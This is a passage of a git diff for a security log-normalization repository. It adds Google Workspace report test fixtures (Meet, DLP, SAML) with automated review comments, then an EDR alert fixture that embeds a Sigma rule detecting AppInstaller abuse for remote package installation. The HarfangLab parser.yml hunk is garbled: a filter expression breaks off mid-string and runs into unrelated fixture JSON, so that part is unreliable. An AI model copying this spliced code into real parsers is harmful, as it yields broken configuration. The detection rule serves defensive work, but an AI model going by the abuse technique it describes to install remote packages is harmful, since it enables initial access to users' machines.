,\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value
\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T11:32:12.301000Z", + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "BUSOHGFTVB" + } + } + }, + "network": { + "application": "meet", + "transport": "tcp" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_meet_sample1.json b/Google Cloud/google-report/tests/test_meet_sample1.json index 406a0943c..fd7b1fa66 100644 --- a/Google Cloud/google-report/tests/test_meet_sample1.json +++ b/Google Cloud/google-report/tests/test_meet_sample1.json 
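Review bot: The input carries `is_external: true` (plus `device_type: web` and `display_name: Yuki`) but nothing in the expected event surfaces it, so an external participant in a Meet call is indistinguishable from an internal one after normalization. That flag is the one field a SOC would filter on for this event type; if the parser can read `boolValue` parameters, pin it here, e.g. `"meet": { "code": "BUSOHGFTVB", "is_external": true }` under `google.report`. The companion `test_end_call.json` has `is_external: false`, so the pair would give positive and negative coverage for the mapping.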
@@ -41,13 +41,20 @@
 "transport": "udp"
 },
 "related": {
+ "ip": [
+ "5555:333:333:5555:5555:5555:5555:5555"
+ ],
 "user": [
 "jone.doe"
 ]
 },
+ "source": {
+ "address": "5555:333:333:5555:5555:5555:5555:5555",
+ "ip": "5555:333:333:5555:5555:5555:5555:5555"
+ },
 "user": {
 "domain": "test.com",
- "email": "jone.doe@test.com",
+ "email": "joe.done@test.com",
 "id": "1098488062555",
 "name": "jone.doe"
 }
diff --git a/Google Cloud/google-report/tests/test_rules_sample_1.json b/Google Cloud/google-report/tests/test_rules_sample_1.json
new file mode 100644
index 000000000..3f7ef889b
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_rules_sample_1.json
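Review bot: The expected `user.email` changes from `jone.doe@test.com` to `joe.done@test.com` while `user.name` and `related.user` on the surrounding context lines still read `jone.doe`; in the SAML fixtures of this same change `user.name` is the local part of `user.email`, so either the email edit is a typo or the two name fields are now stale. The input message sits outside this hunk, so please check `actor.email` there and align all three values — either restore `"email": "jone.doe@test.com"` or also update `"name"` and `related.user` to `joe.done`. The new IPv6 placeholder works, but `2001:db8::` (RFC 3849) is the documentation prefix intended for fixtures like this.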
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"233165468629800000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"113328670183616666666\"},\"events\":[{\"type\":\"action_complete_type\",\"name\":\"action_complete\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaq0000000\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka00000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"matched_trigger\",\"value\":\"DRIVE_SHARE\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "action_complete", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro 
IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": "LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "113328670183616666666", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_rules_sample_2.json b/Google Cloud/google-report/tests/test_rules_sample_2.json new file mode 100644 index 000000000..f7a1e9bf9 --- /dev/null +++ b/Google Cloud/google-report/tests/test_rules_sample_2.json 
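Review bot: The DLP rule identity is pinned only under the custom `google.report.rule.*` keys, although ECS already defines `rule.name`, `rule.id` and `rule.ruleset`; `rule_resource_name` (`policies/aka00000000000`) is the stable identifier and should land in `rule.id` so rule-centric detections and dashboards work across intakes. `event.category` is absent here while every other fixture in the change sets one, and `severity: LOW` stays a string under `google.report.rule.severity` with no `event.severity` counterpart. A suggested addition to the expected block is `"rule": { "id": "policies/aka00000000000", "name": "DLP [Drive] - …", "ruleset": "DLP" }`, hedged because the parser is not in this diff and may not emit these yet.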
@@ -0,0 +1,55 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:21:46.270Z\",\"uniqueQualifier\":\"-49907177521610000000\",\"applicationName\":\"rules\",\"customerId\":\"C02i38888\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/\\\"\",\"actor\":{\"email\":\"john.doe@test.com\",\"profileId\":\"11332867018361686666666\"},\"events\":[{\"type\":\"content_matched_type\",\"name\":\"content_matched\",\"parameters\":[{\"name\":\"data_source\",\"value\":\"DRIVE\"},{\"name\":\"resource_id\",\"value\":\"1K23Am8JmHL9vgGwUjUPaqDZV\"},{\"name\":\"resource_owner_email\",\"value\":\"john.doe@test.com\"},{\"name\":\"rule_resource_name\",\"value\":\"policies/aka000000000\"},{\"name\":\"rule_name\",\"value\":\"DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN\"},{\"name\":\"rule_type\",\"value\":\"DLP\"},{\"name\":\"matched_detectors\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"detector_id\",\"value\":\"IBAN_CODE\"},{\"name\":\"detector_type\",\"value\":\"PREDEFINED_DLP\"},{\"name\":\"display_name\",\"value\":\"IBAN_CODE\"}]}]},{\"name\":\"triggered_actions\",\"multiMessageValue\":[{\"parameter\":[{\"name\":\"action_type\",\"value\":\"DRIVE_WARN_ON_EXTERNAL_SHARING\"}]}]},{\"name\":\"resource_recipients\",\"multiValue\":[\"john.doe@test.com\"]},{\"name\":\"scan_type\",\"value\":\"DRIVE_ONLINE_SCAN\"},{\"name\":\"severity\",\"value\":\"LOW\"},{\"name\":\"resource_type\",\"value\":\"DOCUMENT\"},{\"name\":\"resource_title\",\"value\":\"8157822-2024-11-7-15-21-0\"}]}]}", + "event": { + "action": "content_matched", + "dataset": "admin#reports#activity", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-07T14:21:46.270000Z", + "cloud": { + "account": { + "id": "C02i38888" + } + }, + "google": { + "report": { + "actor": { + "email": "john.doe@test.com" + }, + "rule": { + "data_source": "DRIVE", + "name": "DLP [Drive] - D\u00e9tecter le partage de International - Num\u00e9ro IBAN", + "scan_type": "DRIVE_ONLINE_SCAN", + "severity": 
"LOW", + "type": "DLP" + } + } + }, + "network": { + "application": "rules" + }, + "related": { + "user": [ + "john.doe" + ] + }, + "user": { + "domain": "test.com", + "email": "john.doe@test.com", + "id": "11332867018361686666666", + "name": "john.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json new file mode 100644 index 000000000..8a9785816 --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success.json 
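Review bot: This `content_matched` fixture drops the fields a DLP match is actually triaged on: `matched_detectors` (IBAN_CODE / PREDEFINED_DLP), `triggered_actions` (DRIVE_WARN_ON_EXTERNAL_SHARING), `resource_recipients`, `resource_id` and `resource_title` appear nowhere in the expected output. Without the recipients and the triggered action an analyst cannot tell from the normalized event whether the document left the domain or the user was merely warned; if the parser can walk `multiMessageValue`/`multiValue` parameters, pin them here, e.g. `"resource": { "id": "1K23Am8JmHL9vgGwUjUPaqDZV", "title": "8157822-2024-11-7-15-21-0", "recipients": ["john.doe@test.com"] }` under `google.report`. Structurally this fixture is otherwise identical to `test_rules_sample_1.json`, so only `event.action` distinguishes the two.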
@@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:26:15.515000Z", + "cloud": { + "account": { + "id": "C00000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, 
+ "related": { + "ip": [ + "2.1.3.2" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "2.1.3.2", + "ip": "2.1.3.2" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "10344515534360000000", + "name": "John.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json new file mode 100644 index 000000000..de8e102d7 --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json 
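Review bot: `user.name` and `related.user` are pinned as `John.doe`, the raw mixed-case local part of `actor.email`; if other events for the same account arrive with a lowercase address (as the rules fixtures in this change do for `john.doe`), a `related.user` join between a SAML login and a Drive DLP event misses. If the parser cannot normalise case, that is at least worth stating on the intake; if it can, pin `"name": "john.doe"` here while keeping `user.email` exactly as received. `orgunit_path` (`/test/implementation`) is also dropped from the expected event although it is the natural scoping field for an SSO login to `AWS`.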
@@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:24:58.191000Z", + "cloud": { + "account": { + "id": "C000000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS Client VPN", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + 
"application": "saml" + }, + "related": { + "ip": [ + "8.6.15.1" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "8.6.15.1", + "ip": "8.6.15.1" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "113844576558700000000", + "name": "John.doe" + } + } +} \ No newline at end of file diff --git a/HarfangLab/harfanglab/ingest/parser.yml b/HarfangLab/harfanglab/ingest/parser.yml index 1376e0758..5050c7429 100644 --- a/HarfangLab/harfanglab/ingest/parser.yml +++ b/HarfangLab/harfanglab/ingest/parser.yml 
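Review bot: This fixture is a near-duplicate of `test_saml_login_success.json` (same actor, same `initiated_by: sp`, same `SUCCESS_URI`), differing only in IP, org unit and `application_name`, so it adds no new branch coverage for the SAML mapping. What is missing is a failure sample with a non-`SUCCESS_URI` `saml_status_code`, which would pin the negative path (`event.type: ["denied"]` and, if the parser sets it, `event.outcome: "failure"`) that a detection for failed SSO into AWS depends on. `8.6.15.1` here and `2.1.3.2` in the sibling fixture are routable addresses; RFC 5737 ranges (`198.51.100.0/24`, `203.0.113.0/24`) keep enrichment from resolving real hosts.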
@@ -29,6 +29,14 @@ pipeline: input_field: "{{json_event.message.event_data.TaskContent}}" output_field: message + - name: parse_task_info_2 + filter: "{{json_event.message.eventlog.event_data.TaskContent != null and ':\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation 
process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch 
-p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation. 
All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - 
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - 
